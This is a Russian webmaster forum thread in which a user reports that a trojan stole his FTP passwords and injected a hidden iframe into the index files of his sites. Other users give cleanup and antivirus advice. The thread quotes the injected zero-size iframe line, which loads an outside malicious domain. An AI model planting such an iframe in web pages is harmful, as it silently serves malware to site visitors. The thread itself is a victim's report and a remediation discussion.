Опасная инъекция в сайты от mdfc.info - у меня заразились все 30 сайтов!

shamkovel
На сайте с 13.11.2005
Offline
38
43759

Внимание всем - эпидемия вируса!

Началось с того, что у меня перестали открываться мои сайты в IE. Потом упал IE - ну туда ему и дорога ...

Начал смотреть и обнаружил, что в файлах index.htm и index.php прописан следущий код:

<!-- ~ --><iframe width="0" height="0" src="http://mdfc.info"></iframe><!-- ~ -->

аккурат в конце.

Этот ифрейм, вызывает сайт, на котором скрипт лезет в IE и заставляет его качать какую-то гадость. Остальные браузеры нормально его переносят - игнорируют.

Я вначале подумал, что хостинг взломали, но когда обнаружил, что даже сайты на народе заражены - понял, что троян. Он использовал ftp пароли из Total Comander.

В страшной злобе прошерстил комп, нашел троян. Заменил пароли и убрал инъекции.

НО! Спустя день обнаружил, что скрипт прописывается во ВСЕ index файлы всех подпапок (например в джумле мне пришлось менять около 250 файлов!!!!).

Я конечно все убил. Но, скажите, как защититься-то? Как представил, скольких мои сайты заразили .... :eek:

Кто что знает?

Лицо, как зеркало души (http://shamkovel.ru/article/zerkalo_dushy)
The WishMaster
На сайте с 29.09.2005
Offline
2542
#1

Мне лень ловить бинарник, если честно.. думаю, стоит проверить список процессов для начала, в расчете на то, что троян тупой. Проверь, есть ли там что-то лишнее. Если не знаешь, выложи список или скрин.

Кому старенького креативного копирайтера? Тематики - туризм, СЕО, творчество, кулинария, шизотерика :)
shamkovel
На сайте с 13.11.2005
Offline
38
#2
The WishMaster:
Мне лень ловить бинарник, если честно.. думаю, стоит проверить список процессов для начала, в расчете на то, что троян тупой. Проверь, есть ли там что-то лишнее. Если не знаешь, выложи список или скрин.

К своему стыду, ничего не понял ... Скрин чего выложить?

L
На сайте с 19.11.2006
Offline
50
#3

ctrl+alt+delite в окошке вкладка процессы.

Это процессы, которые в данное время использует твоя ОС.

814
shamkovel
На сайте с 13.11.2005
Offline
38
#4
lirik:
ctrl+alt+delite в окошке вкладка процессы.
Это процессы, которые в данное время использует твоя ОС.

Вот картинка: http://shamkovel.ru/files/1.jpg

Kislov
На сайте с 29.04.2006
Offline
185
#5

Писал вчера про этот троян в спец. теме анонса белых каталогов. Данный вирус был замечен в одном из каталогов спец. темы. Правда подгуражался с другого адреса.

Nod32 удачно его ловит и блокирует.

Поэтому вывод один: работать при включённом антивирусе.

bondarev.pp.ru
На сайте с 29.09.2005
Offline
202
#6

У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.

bondarevpipes.com (http://ru.bondarevpipes.com/)
mutex
На сайте с 10.04.2005
Offline
64
#7
shamkovel:
К своему стыду, ничего не понял ... Скрин чего выложить?

Установите тулзу от sysinternals

http://www.microsoft.com/technet/sysinternals/ProcessesAndThreads/ProcessExplorer.mspx

Показывает все процессы хэндлы, дллы под процессом.

Незаменимая вещь для удаления вражеского ПО.

~~
Kislov
На сайте с 29.04.2006
Offline
185
#8
bondarev.pp.ru:
У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.

Вот я и советую ставить антивирусы, которые ловят вирусы на лету и не дают им загрузиться.

shamkovel:
НО! Спустя день обнаружил, что скрипт прописывается во ВСЕ index файлы всех подпапок (например в джумле мне пришлось менять около 250 файлов!!!!).

Это не так сложно. Есть программки, которые помагают вносить изменения сразу в куча файлов. К примеру, если потребовалось удалить данный код указываем данный код в окошке найти, а окошко заменить оставляем пустое. (Это я про Text Replacer)

shamkovel
На сайте с 13.11.2005
Offline
38
#9
bondarev.pp.ru:
У меня был недавно такой троянчик. Аваст его полечил. Но IE до сих пор не открываеся - дллки какой-то, говорит, не хватает. Но и фиг с ним.

Вот-вот - этот вирус прописался в dll экспловера, а без него работать естественно не будет.

Кстати, может кто скажет - где 6 IE скачать можно (чтобы смотреть как себя дизайн ведет), ну или этот dll ...

shamkovel
На сайте с 13.11.2005
Offline
38
#10
Kislov:
Это не так сложно. Есть программки, которые помагают вносить изменения сразу в куча файлов. К примеру, если потребовалось удалить данный код указываем данный код в окошке найти, а окошко заменить оставляем пустое. (Это я про Text Replacer)

Так так, по подробнее, что за програмка?

И сможет ли она работать на хостинге?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий